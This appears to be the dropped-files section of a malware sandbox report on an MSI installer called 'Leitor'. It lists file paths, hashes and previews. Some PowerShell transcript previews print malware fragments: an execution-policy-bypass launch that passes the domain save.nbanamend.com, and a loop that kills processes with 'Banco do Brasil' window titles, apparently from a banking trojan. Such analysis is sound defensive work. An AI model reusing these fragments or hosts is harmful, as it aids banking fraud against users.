                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.E7hCd+VW.20211123210046.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1283
                                                Entropy (8bit):5.209156692613863
                                                Encrypted:false
                                                SSDEEP:24:BxSA4DvBBEx2DOXvgKj7PWjhMX3Uu6W0HjeTKKjX4CIym1ZJXXOAoElRnxSAZOS:BZUv/EoO/gKPPWjhQUw0qDYB1ZuEllZ1
                                                MD5:AC4BB3947F06D943ED5FFD9A168A80E4
                                                SHA1:7A84BBFA678423C2E41181D3E69515EA4D7FB1B4
                                                SHA-256:5AE619625889E727226F056BED772ADE1136202860C3091CD9D2EAF511814993
                                                SHA-512:ADD038A513BBA60B5BD8BC0DE9C751FEA38DA457E28BA1A3D8F26A19F70A87019E73CD25CF3F596C2475331BD0E17756EF247AF9E7D6453898DF475974C75CEE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211123210058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pssFF45.ps1 -propFile C:\Users\user\AppData\Local\Temp\msiFDAB.txt -scriptFile C:\Users\user\AppData\Local\Temp\scrFDAC.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scrFDAD.txt -propSep :<->: -testPrefix _testValue...Process ID: 3492..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************...... Directory: C:\......Mode LastWriteTime Length Name..---- ------------- ----
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.VqQir04h.20211123210136.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1398
                                                Entropy (8bit):5.1386794448694975
                                                Encrypted:false
                                                SSDEEP:24:BxSAVDvBBEx2DOXUWSBLWEUHjeTKKjX4CIym1ZJXS97lFSArxSArxxSA3ZDqeyCh:BZtv/EoOy4lqDYB1Zo97zVrj3MeyCbEs
                                                MD5:A23F301A69AE98A4E7D74A906AB460B8
                                                SHA1:90D370121CDCC1625761D36F80708E8E17D8691D
                                                SHA-256:66DE2E751B7C473054C84E7C3C12858222D896265B1B9271CD22581FAEA9BF27
                                                SHA-512:2970CFBBAD027589AB9E9C558BC2B102102EEE1BD6C4F0700A4EA648EC9A8D891967F8976196AF4E584E185B1122FFEA04451BFFBE1935E85771B9F9992B51F1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211123210138..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com..Process ID: 7156..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211123210139..**********************..PS>CommandInvocation(QIZABC.ps1): "QIZABC.ps1"..**********************..Command start time: 20211123210322..**********************..PS>TerminatingError(Import-Module): "Windows PowerShell Workflow is not supported in a Wi
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.jQu8Ha_F.20211123210146.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1307
                                                Entropy (8bit):5.377416899832415
                                                Encrypted:false
                                                SSDEEP:24:BxSA+DvBBEx2DOXU4pWMHjeTKKjX4CIym1ZJXjDNrqs5xLoXUeJ+IVRGYy:BZGv/EoOuMqDYB1ZdDN95xLoXU8+IDpy
                                                MD5:5D8E87A12F34D0DC45F60A95E632C046
                                                SHA1:4358475E80B15BBA15B5821BC8C5B3DCA76C94B5
                                                SHA-256:18FC0D405ACBFF2F4C66BCB7F7D51793FB46E240DA9CDF507493747CE8CAD1B1
                                                SHA-512:29076EF0F0A2C1D19DB760D5BD43CCD2C3D039D9A1EAEA25D4314496858E63FA1886CFE32C34EE05F9C28C672D4D6F79799E7BBFD73DB72CBD679800FDC7D3D9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211124001657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Version 5.1 -s -NoLogo -NoProfile..Process ID: 6352..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211124001657..**********************..PS>...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -
                                                C:\Windows\Installer\3ed8de.msi
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Code page: 1252, Revision Number: {2E1E2189-2426-4422-848B-7807DE130F24}, Number of Words: 10, Subject: Leitor, Author: Leitor, Name of Creating Application: Leitor (Evaluation Installer), Template: ;1046, Comments: 3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Security: 0, Number of Pages: 200
                                                Category:dropped
                                                Size (bytes):6378496
                                                Entropy (8bit):7.868304383682033
                                                Encrypted:false
                                                SSDEEP:98304:s+QXPWTFcvpvyZYHAsmSdP33SfWww2wXaJ/Bci89ZaqN+rFzO4bj/y7dYWePRpwp:7Qex8NdP33SfWwwdKDFZj/QLePRpr3
                                                MD5:5BFE975A60A97C93175C935C6D621E04
                                                SHA1:5BC30F0F540A957D2CC489BBCE2C1A7F137069E0
                                                SHA-256:464FE77F576D8273564BB5B7976B381855D962017F4DA6B5A363AF78BF788799
                                                SHA-512:DEA24EE9D249D715C1DAC5976B4B023EB7C15E15B34A5BA31DB7D8542C96553F7F0DD33CF86F00759C71DCD5200941EB364E04409DD3193D3E2270D6DFFE1130
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\MSIDE8B.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\MSIE17A.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\MSIE275.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\MSIE39F.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\MSIE601.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3994
                                                Entropy (8bit):5.252306240933896
                                                Encrypted:false
                                                SSDEEP:48:u1VI5A4sUxk6x94j/fETDN/7a+EC6PAytbAMB+RX+umKrTG51XGOyw9OnUKK1:uc5ApZj/4q3IF+um8y51XGOH4w
                                                MD5:7D3C7DBA70779A78DF2C9EF83E9EA241
                                                SHA1:0F072F97838044D366B9AE72DAEA537A0B3F88FF
                                                SHA-256:A771457CA5CC3636C79F2E8BE99D8E71E168E57DB93C28B308292D1896572A8B
                                                SHA-512:798CFC47D6C6C3401A5A2E3188E1695302412A856EE51B6DE0D36B83F1454AA364F6826D776D613CFA163825701208F5C536E5DE4D1AC81F201DDBA692ACB45F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...@IXOS.@.....@..wS.@.....@.....@.....@.....@.....@......&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}..Leitor..YwZpT3p5Rh.msi.@.....@..-..@.....@........&.{2E1E2189-2426-4422-848B-7807DE130F24}.....@.....@.....@.....@.......@.....@.....@.......@......Leitor......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{A01EEA68-8EB3-45E6-A279-AE2135F94188}..C:\ProgramData\Leitor\zlib1.dll.@.......@.....@.....@......&.{0786B0D2-2694-4535-8058-0D8685B9AAD7}..C:\ProgramData\Leitor\.@.......@.....@.....@......&.{CC477C94-8417-4703-8FC1-093E5F91DFCD}).C:\ProgramData\Leitor\libgcc_s_sjlj-1.dll.@.......@.....@.....@......&.{149D3DBD-9682-4CCE-8D17-5F80A80F4433}$.C:\ProgramData\Leitor\capturador.exe.@.......@.....@.....@......&.{4DB31090-FD14-4084-844F-1D28D846239A}+.C:\ProgramData\Leitor\capturador.exe.config.@.......@.....@.....@......&.{44339
                                                C:\Windows\Installer\MSIFCD8.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):583136
                                                Entropy (8bit):6.548436673849084
                                                Encrypted:false
                                                SSDEEP:12288:6IcIRwUhwp7YWaUz4KnniqXhBmbq1x+BzYeqzdT8rd1yAvpPFIWsJkZ/DOoWwXiW:5HSiuTz+BzYeqzdT8Lvp+CZyzoiQ
                                                MD5:EEACF76535BBB010B9407D94288933DE
                                                SHA1:D30E40F531BB1074FE78595EF647B56B7C6609E4
                                                SHA-256:322023EEE9182800B4160C2B1E739D3E7850CC127DA9D2BD77E705CA5F2D2E56
                                                SHA-512:81F446CD0EC952DC9B28634D3C6BA94942967CAE5F5FCC84D336B1D0B4C19933CFE68FC6FE501374D101F5DC6048CD29B5171BB62C1EC56240A5539A07D75E99
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\SourceHash{06F68BF0-637D-4106-89BA-F09C8D12ADAA}
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.1649419677260844
                                                Encrypted:false
                                                SSDEEP:12:JSbX72FjJ6AGiLIlHVRpZh/7777777777777777777777777vDHF+DZfVKit/l0G:JWQI5tcDZfNiF
                                                MD5:BD7BB8E2AB951F2B339DB2873F28A619
                                                SHA1:5932F273AB6C7824DFC952337A707E941EF178F6
                                                SHA-256:550CEFEDA0166CDE68B2F462122CEDE4BB43A4AC7FD2EB5747FA3FF11E68F189
                                                SHA-512:915548EA6D1DADF3289F2A2781774B2B2BE3C6B378461350A6D624F7951A8E26A81CEACC2CABBDDC669C0212BD9B493D991BEDADE1C60779271A38FA9DD92492
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Installer\inprogressinstallinfo.ipi
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):81287
                                                Entropy (8bit):5.298743893900412
                                                Encrypted:false
                                                SSDEEP:192:XL/vcrZZDZo/ZrXczaIcO/gcMH5elWSLJ:XDvsDZGrkaIcO/Y5XuJ
                                                MD5:22956ED1ACD7ED830260CC4E2DF0A47B
                                                SHA1:27C4382062D2CA8654CBC64B3FACEE8B6DE16074
                                                SHA-256:2D8BA86F14259DE121DA0013C8086017D52F51A1AA10CC6AF7118C4DB504A2D1
                                                SHA-512:439536BCE961CAB3AA56211B8F310275C0382ADA8B3055994B19EB36AFEFD72D9CCA62FBEFE94CAF5E51ED47EE11D749A13C27AEAC03B6572B75B73B8884CDB1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:38:04.497 [4552]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.513 [4552]: ngen returning 0x00000000..07/23/2020 10:38:04.559 [4480]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.559 [4480]: ngen returning 0x00000000..07/23/2020 10:38:04.622 [4256]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.622 [
                                                C:\Windows\Temp\~DF1E9A83E3A2317BA7.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF3FC048FA2561951F.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF4C970C91E7D9735D.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF61AD31ED53F8E916.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF6778FD2489D73903.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF92B7334624ABB5EE.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DF94DE3924A75DD634.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):0.07156692297043304
                                                Encrypted:false
                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO+DIkyWfVWstgVky6lit/:2F0i8n0itFzDHF+DZfVDZit/
                                                MD5:02D5527BB4EA23BD9E4FB554CABBBD64
                                                SHA1:42B82651668375118A406A62B381B4F1AFFDFB17
                                                SHA-256:6967D2B74CC00FE72B47B8E1707CECA248E173E74FE35DEFFAB82EBA8470F65D
                                                SHA-512:B84719A096D943AEB12BC1D767923C962DDC937A9DAA08BD2B95E8316C227EDDDEAB91B567EED59252208FC006D35BC0119FD68C0E99850A56FB3C7443638E50
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DFB14C79765BBDE995.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DFB462A87B2A3BF2B0.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DFEAFE010FEAF503B0.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DFED7ED3B179C7609A.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):0.10454138761120342
                                                Encrypted:false
                                                SSDEEP:24:K3tTx+XW9ipV+XWT+XWjAEV0yjCylJipV+XWUVQwG53+kn:4tT4SSkjgAErCyDSkPah
                                                MD5:46DB8C5B4E97DA817331796209AD1B38
                                                SHA1:23E7B5B4C6A63AF4917A4D9B6D76A6B597718696
                                                SHA-256:4EF3F67E589BD303E05C74FBF20CBAF1BB01589E901B48FF6D38C19958ACB10B
                                                SHA-512:9A5007426EAD23F0182885A40E7E501B73853533BAC907657EEACA7883FAB753F337BFDC021C5493CB2B9CBC8B744A1A5FF5ACFFAEE851F6F4D88C0C10C2DAA8
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Windows\Temp\~DFF9B8B78DD3B5105A.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                \Device\ConDrv
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):0
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:24:9xApVIjQX3Bn5z4C/v9jP7omqVpSmqVxWwS4hzSZKbjV/8knv:9GXZXxn53jTDap9avSZAUc
